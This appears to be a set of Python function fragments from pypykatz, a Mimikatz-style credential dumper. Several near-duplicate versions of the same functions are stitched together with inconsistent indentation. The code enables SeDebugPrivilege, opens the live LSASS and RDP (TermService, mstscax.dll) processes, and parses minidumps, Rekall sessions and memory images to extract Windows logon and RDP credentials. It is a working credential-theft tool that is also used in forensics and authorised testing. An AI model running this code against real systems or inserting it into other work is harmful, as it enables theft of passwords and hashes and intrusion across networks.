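	def go_live(pid = None, all_rdp = False):
		"""
		Open live RDP-related processes on the local host and start credential parsing.

		pid: when given, only this process is opened and parsed.
		all_rdp: when True (and pid is None), every process that has mstscax.dll
		    loaded is parsed in addition to the TermService host process.
		Returns the list of started RDPCredParser objects (may be empty).
		Raises Exception when not running on Windows; the Windows-only imports
		are deferred until after that check so the module stays importable elsewhere.
		"""
		if platform.system() != 'Windows':
			raise Exception('Live parsing will only work on Windows')
		from pypykatz.commons.winapi.machine import LiveMachine
		from pypykatz.commons.winapi.constants import PROCESS_VM_READ , PROCESS_VM_WRITE , PROCESS_VM_OPERATION , PROCESS_QUERY_INFORMATION , PROCESS_CREATE_THREAD
		from pypykatz.commons.readers.local.common.privileges import enable_debug_privilege
		from pypykatz.commons.readers.local.live_reader import LiveReader
		from pypykatz.commons.readers.local.process import Process
		# NOTE(review): VM_WRITE / VM_OPERATION / CREATE_THREAD are broader than a
		# read-only memory parser needs. Confirm RDPCredParser actually requires
		# them; otherwise narrow to PROCESS_VM_READ | PROCESS_QUERY_INFORMATION so a
		# bug in the parser cannot modify or inject into the target process.
		req_access_rights = PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION | PROCESS_CREATE_THREAD

		def _attach(process):
			# Wrap an opened process in a reader and queue a parser for it.
			reader = LiveReader(process_handle=process.phandle)
			sysinfo = KatzSystemInfo.from_live_reader(reader)
			return RDPCredParser(process, reader.get_buffered_reader(), sysinfo)

		# SeDebugPrivilege is needed to open processes owned by other users
		# (the TermService host runs as SYSTEM).
		enable_debug_privilege()
		targets = []

		if pid is not None:
			process = Process(pid=pid, access = req_access_rights )
			# Result intentionally unused; kept because the original populated the
			# module list before parsing — presumably the Process object caches it.
			process.list_modules()
			targets.append(_attach(process))

		else:
			machine = LiveMachine()
			for service_name, display_name, service_pid in machine.list_services():
				if service_name == 'TermService':
					targets.append(_attach(Process(pid=service_pid, access = req_access_rights )))

			if all_rdp is True:
				for candidate_pid in machine.list_all_pids():
					try:
						process = Process(pid=candidate_pid, access = req_access_rights )
						if any("mstscax.dll" in module.name.lower() for module in process.list_modules()):
							targets.append(_attach(process))
					except Exception as e:
						# Best-effort sweep: protected, exited or otherwise
						# unopenable processes are expected here, so report and move on.
						print(e)

		for target in targets:
			target.start()
		return targets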
 def parse_memory_dump_rekall(filename, override_timestamp=None):
     """Parse a full memory image through the Rekall reader and run pypykatz over it.

     filename: path of the memory dump handed to RekallReader.from_memory_file.
     override_timestamp: optional value forwarded to the reader unchanged
         (its meaning is owned by RekallReader).
     Returns the started pypykatz instance.
     """
     from pypykatz.commons.readers.rekall.rekallreader import RekallReader
     rekall_reader = RekallReader.from_memory_file(filename, override_timestamp)
     system_info = KatzSystemInfo.from_rekallreader(rekall_reader)
     katz = pypykatz(rekall_reader, system_info)
     katz.start()
     return katz
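	def go_rekall(session, override_timestamp = None, buildnumber = None, packages = None):
		"""
		Run pypykatz on top of an existing Rekall session.

		session: live Rekall session object handed to RekallReader.from_session.
		override_timestamp, buildnumber: forwarded to the reader unchanged.
		packages: list of pypykatz package names to run; None means ['all'].
		Returns the started pypykatz instance.
		"""
		if packages is None:
			# Fresh list per call instead of a shared mutable default argument.
			packages = ['all']
		from pypykatz.commons.readers.rekall.rekallreader import RekallReader
		reader = RekallReader.from_session(session, override_timestamp, buildnumber)
		sysinfo = KatzSystemInfo.from_rekallreader(reader)
		mimi = pypykatz(reader, sysinfo)
		mimi.start(packages)
		return mimi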
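 def go_live_phandle(lsass_process_handle, packages=None):
     """Parse LSASS through a process handle the caller already opened (Windows only).

     lsass_process_handle: handle to the LSASS process; it must carry enough
         access for LiveReader to read the process memory.
     packages: list of pypykatz package names to run; None means ['all'].
     Returns the started pypykatz instance.
     Raises Exception on non-Windows hosts, before any Windows-only import.
     """
     if packages is None:
         # Fresh list per call instead of a shared mutable default argument.
         packages = ['all']
     if platform.system() != 'Windows':
         raise Exception('Live parsing will only work on Windows')
     from pypykatz.commons.readers.local.live_reader import LiveReader
     reader = LiveReader(lsass_process_handle=lsass_process_handle)
     sysinfo = KatzSystemInfo.from_live_reader(reader)
     mimi = pypykatz(reader.get_buffered_reader(), sysinfo)
     mimi.start(packages)
     return mimi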
 def go_live():
     """Open LSASS on the local Windows host and run every pypykatz module over it.

     Returns the started pypykatz instance.
     Raises Exception when not running on Windows (checked before the
     Windows-only reader import).
     """
     if platform.system() != 'Windows':
         raise Exception('Live parsing will only work on Windows')
     from pypykatz.commons.readers.local.live_reader import LiveReader
     live_reader = LiveReader()
     system_info = KatzSystemInfo.from_live_reader(live_reader)
     katz = pypykatz(live_reader.get_buffered_reader(), system_info)
     katz.start()
     return katz
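    def parse_minidump_buffer(buff, packages=None):
        """
        Parse an LSASS minidump whose contents sit in an in-memory buffer.

        buff: io.BytesIO object holding the minidump bytes. Dump files are
            attacker-controllable input; all format validation lives in
            MinidumpFile.parse_buff.
        packages: list of pypykatz package names to run; None means ['all'].
        Returns the started pypykatz instance.
        """
        if packages is None:
            # Fresh list per call instead of a shared mutable default argument.
            packages = ['all']
        minidump = MinidumpFile.parse_buff(buff)
        reader = minidump.get_reader().get_buffered_reader()
        sysinfo = KatzSystemInfo.from_minidump(minidump)
        mimi = pypykatz(reader, sysinfo)
        mimi.start(packages)
        return mimi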
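    def parse_minidump_bytes(data, packages=None):
        """
        Parse an LSASS minidump given as raw bytes.

        data: bytearray with the minidump contents (as the original docstring
            required; whether bytes is also accepted is up to MinidumpFile.parse_bytes).
        packages: list of pypykatz package names to run; None means ['all'].
        Returns the started pypykatz instance.
        """
        if packages is None:
            # Fresh list per call instead of a shared mutable default argument.
            packages = ['all']
        minidump = MinidumpFile.parse_bytes(data)
        reader = minidump.get_reader().get_buffered_reader()
        sysinfo = KatzSystemInfo.from_minidump(minidump)
        mimi = pypykatz(reader, sysinfo)
        mimi.start(packages)
        return mimi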
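	async def parse_minidump_external(handle, packages = None, chunksize=10*1024):
		"""
		Parse an LSASS minidump from a file-like object, asynchronously.
		The object can be anything that implements read, seek and tell
		with the same parameters a file object would.

		handle: file-like object positioned at the start of the dump
		packages: list of pypykatz package names to run; None means ['all']
		chunksize: segment chunk size handed to the buffered reader
		Returns the started apypykatz instance.
		"""
		if packages is None:
			# Fresh list per call instead of a shared mutable default argument.
			packages = ['all']
		minidump = await AMinidumpFile.parse_external(handle)
		reader = minidump.get_reader().get_buffered_reader(chunksize)
		sysinfo = KatzSystemInfo.from_minidump(minidump)
		mimi = apypykatz(reader, sysinfo)
		await mimi.start(packages)
		return mimi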
    def parse_minidump_external(handle):
        """
        Parse an LSASS minidump read through a file-like object.
        Any object exposing read, seek and tell with file-object
        semantics works; nothing else is required of it.

        handle: file-like object positioned at the start of the dump
        Returns the started pypykatz instance (all packages).
        """
        dump = MinidumpFile.parse_external(handle)
        buffered = dump.get_reader().get_buffered_reader()
        system_info = KatzSystemInfo.from_minidump(dump)
        katz = pypykatz(buffered, system_info)
        katz.start()
        return katz
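	def parse_minidump_file(filename, rdp_module, chunksize = 10*1024):
		"""
		Parse RDP credentials out of a minidump file on disk.

		filename: path of the minidump to parse
		rdp_module: forwarded to RDPCredParser unchanged
		chunksize: segment chunk size for the buffered reader
		Returns a single-element list holding the started RDPCredParser.
		Raises whatever MinidumpFile.parse / RDPCredParser raise; parsing
		errors are logged before being re-raised.
		"""
		try:
			minidump = MinidumpFile.parse(filename)
			reader = minidump.get_reader().get_buffered_reader(segment_chunk_size=chunksize)
			sysinfo = KatzSystemInfo.from_minidump(minidump)
		except Exception:
			logger.exception('Minidump parsing error!')
			# Bare raise keeps the original traceback instead of re-raising `e`.
			raise
		try:
			# No live process here: the parser works purely off the dump reader.
			mimi = RDPCredParser(None, reader, sysinfo, rdp_module)
			mimi.start()
		except Exception:
			logger.info('Credentials parsing error!')
			raise
		return [mimi]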
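	async def parse_minidump_file(filename, packages = None, chunksize=10*1024):
		"""
		Parse an LSASS minidump file on disk, asynchronously.

		filename: path of the minidump to parse
		packages: list of pypykatz package names to run; None means ['all']
		chunksize: segment chunk size for the buffered reader
		Returns the started apypykatz instance.
		Raises whatever the dump parser or the credential modules raise; a
		failure during module execution first logs whatever was recovered.
		"""
		if packages is None:
			# Fresh list per call instead of a shared mutable default argument.
			packages = ['all']
		try:
			minidump = await AMinidumpFile.parse(filename)
			reader = minidump.get_reader().get_buffered_reader(chunksize)
			sysinfo = KatzSystemInfo.from_minidump(minidump)
		except Exception:
			logger.exception('Minidump parsing error!')
			# Bare raise keeps the original traceback instead of re-raising `e`.
			raise
		# Constructed outside the try: if construction itself failed, `mimi` would
		# be unbound and log_basic_info() below would raise UnboundLocalError,
		# masking the real error.
		mimi = apypykatz(reader, sysinfo)
		try:
			await mimi.start(packages)
		except Exception:
			# Surface what was recovered before the failure, then propagate.
			mimi.log_basic_info()
			raise
		return mimi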
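 def parse_minidump_file(filename):
     """Parse an LSASS minidump file on disk and run every pypykatz module over it.

     filename: path of the minidump to parse.
     Returns the started pypykatz instance.
     Raises whatever the dump parser or the credential modules raise; a
     failure during module execution first logs whatever was recovered.
     """
     try:
         minidump = MinidumpFile.parse(filename)
         reader = minidump.get_reader().get_buffered_reader()
         sysinfo = KatzSystemInfo.from_minidump(minidump)
     except Exception:
         logger.exception('Minidump parsing error!')
         # Bare raise keeps the original traceback instead of re-raising `e`.
         raise
     # Constructed outside the try: if construction itself failed, `mimi` would
     # be unbound and log_basic_info() below would raise UnboundLocalError,
     # masking the real error.
     mimi = pypykatz(reader, sysinfo)
     try:
         mimi.start()
     except Exception:
         # Surface what was recovered before the failure, then propagate.
         mimi.log_basic_info()
         raise
     return mimi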
    def get_sysinfo(self):
        self.sysinfo = KatzSystemInfo()

        #print('[+] Getting BuildNumer')
        self.sysinfo.buildnumber = VmmPy_ConfigGet(
            VMMDLL_OPT_WIN_VERSION_BUILD)
        #print('[+] Found BuildNumber %s' % self.sysinfo.buildnumber)

        #print('[+] Getting msv_dll_timestamp')
        self.sysinfo.msv_dll_timestamp = int(
            PEGetFileTime(self.process_pid, self.process_name))
        #print('[+] Found msv_dll_timestamp %s' % self.sysinfo.msv_dll_timestamp)

        #print('[+] Getting arch')
        val = VmmPy_ConfigGet(VMMPY_OPT_CORE_SYSTEM)
        if val == VMMPY_SYSTEM_WINDOWS_X64:
            self.sysinfo.architecture = KatzSystemArchitecture.X64
        else:
            self.sysinfo.architecture = KatzSystemArchitecture.X86